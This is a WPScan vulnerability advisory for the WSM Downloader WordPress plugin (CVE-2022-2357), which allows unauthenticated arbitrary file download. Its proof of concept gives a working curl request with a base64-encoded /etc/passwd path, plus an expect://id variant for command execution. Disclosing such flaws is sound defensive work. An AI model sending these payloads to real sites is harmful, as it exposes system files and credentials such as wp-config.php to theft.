WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WSM Downloader <= 1.4.0 - Unauthenticated Arbitrary File Download

Description

The plugin allows any visitor to use its remote file download feature to download any local files, including sensitive ones like wp-config.php.

Proof of Concept

# Base64 encode your payload, for example

# Base64(expect://id) -> ZXhwZWN0Oi8vaWQ= (requires the "expect" PECL extension to be installed)
Base64(/etc/passwd) -> L2V0Yy9wYXNzd2Q=

curl -v -d "dl=L2V0Yy9wYXNzd2Q=&size=200&type=text/plain"  https://example.com/page

Affects Plugins

wsm-downloader
No known fix - plugin closed

References

CVE
CVE-2022-2357

Classification

Type

FILE DOWNLOAD

OWASP top 10
A1: Injection
CWE
CWE-552

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter
raadfhaddad
Verified

Yes

WPVDB ID
42499b84-684e-42e1-b7f0-de206d4da553

Timeline

Publicly Published

2022-07-12 (about 2 months ago)

Added

2022-07-12 (about 2 months ago)

Last Updated

2022-08-22 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin